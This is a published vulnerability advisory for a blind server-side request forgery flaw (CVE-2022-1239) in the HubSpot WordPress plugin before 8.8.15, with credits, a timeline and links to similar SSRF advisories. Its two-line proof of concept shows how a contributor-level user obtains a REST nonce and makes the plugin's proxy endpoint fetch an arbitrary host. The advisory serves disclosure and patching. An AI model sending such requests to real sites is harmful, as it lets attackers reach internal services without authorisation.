HubSpot < 8.8.15 – Contributor+ Blind SSRF | CVE 2022-1239 | Plugin Vulnerabilities

Description

The plugin does not validate the proxy URL given to the proxy REST endpoint, which could allow users with the edit_posts capability (by default contributor and above) to perform SSRF attacks

Proof of Concept

As an authenticated user with the edit_posts capability, get REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

https://example.com/wp-json/leadin/v1/proxy?proxyUrl=@domain.com&_wpnonce=8aaf916bd9

Affects Plugins

Fixed in 8.8.15

References

CVE

Classification

Type

SSRF

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter website

https://tomorrowisnew.com

Submitter twitter

Verified

Yes

WPVDB ID

4ad2bb96-87a4-4590-a058-b03b33d2fcee

Timeline

Publicly Published

2022-04-11 (about 3 years ago)

Added

2022-04-11 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2024-06-06

Title

TablePress – Tables in WordPress made easy < 2.3.2 - Authenticated (Author+) Server-Side Request Forgery via DNS Rebind

Published

2025-06-26

Title

Ninja Tables – Easy Data Table Builder < 5.0.19 - Unauthenticated Server-Side Request Forgery

Published

2025-11-18

Title

Responsive Lightbox & Gallery < 2.5.4 - Authenticated (Author+) Server-Side Request Forgery

Published

2025-09-26

Title

Silencesoft RSS Reader <= 0.6 - Unauthenticated Server-Side Request Forgery

Published

2016-12-29

Title

Nelio Ab Testing < 4.5.11 - SSRF